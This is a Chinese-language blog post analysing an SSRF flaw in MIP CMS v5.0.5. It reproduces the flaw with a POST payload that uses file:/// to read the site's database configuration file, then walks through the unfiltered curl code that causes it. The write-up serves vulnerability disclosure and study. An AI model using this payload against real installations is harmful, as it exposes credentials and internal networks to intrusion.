MIP建站系统v5.0.5 SSRF漏洞分析

2020-03-27 约 151 字 预计阅读 1 分钟

声明:本文 【MIP建站系统v5.0.5 SSRF漏洞分析】 由作者 2200 于 2020-03-27 09:51:27 首发 先知社区 曾经 浏览数 122 次

感谢 2200 的辛苦付出!

一、概述
在一个风和日丽的下午,无所事事的刷着CNVD漏洞分享平台,偶然间看到一个公布的CMS的SSRF漏洞;突然奇想,何不复现分析一波,于是故事开始辽。
MIP建站系统是一套免费开源的CMS建站系统,登录该系统后台,可利用SSRF漏洞读取其任意文件,攻击其内网。
二、复现
下载地址:https://mipclouds.oss-cn-beijing.aliyuncs.com/code/mipjz/mipjz-5.0.5.zip
受影响代码位置:app/setting/controller/ApiAdminDomainSettings.php,$api参数可控。
第一步,登陆该后台:

第二步,访问所受影响的代码文件:
http://192.168.10.226/index.php?s=/setting/ApiAdminDomainSettings/urlPost;
POST方法进行请求,payload:
postAddress=file:///C:\phpStudy\PHPTutorial\WWW\app\database.php&url=test&id=test

Soeasy,成功读取到敏感文件。
三、分析
进行简单的漏洞分析。
根据漏洞定位代码文件:app/setting/controller/ApiAdminDomainSettings.php
受影响代码:
public function urlPost(Request $request) {
$postAddress = input('post.postAddress');
if (!$postAddress) {
return jsonError('请先去设置推送的接口');
}
$api = trim($postAddress);
if (strpos($api,'type=realtime') !== false || strpos($api,'type=batch') !== false) {
if (!config('siteInfo')['guanfanghaoStatus']) {
return jsonError('检测到您未开启熊掌号,请开启后再推送');
}
}
$url = input('post.url');
$id = input('post.id');
if (!$url) {
return jsonError('没有检测到你推送的页面地址');
}
$urls[] = $url;
$ch = curl_init();
$options = array(
CURLOPT_URL => $api,
CURLOPT_POST => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POSTFIELDS => implode("\n", $urls),
CURLOPT_HTTPHEADER => array('Content-Type: text/plain'),
);
curl_setopt_array($ch, $options);
$result = curl_exec($ch);

流程分析:

1、$ postAddress = input('post.postAddress');
//POST方法将$postAddress参数传入

2、$api = trim($postAddress);
$options = array(
CURLOPT_URL => $api,
CURLOPT_POST => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POSTFIELDS => implode("\n", $urls),
CURLOPT_HTTPHEADER => array('Content-Type: text/plain'),
);
curl_setopt_array($ch, $options);
//赋予$api参数,一直至$ch,未进行任何过滤
3、$result = curl_exec($ch);
//最后执行
就是这么容易,SSRF漏洞分析小白级普及完成;疫情快快散去,我想出去嗨!

关键词:[‘安全技术’, ‘漏洞分析’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now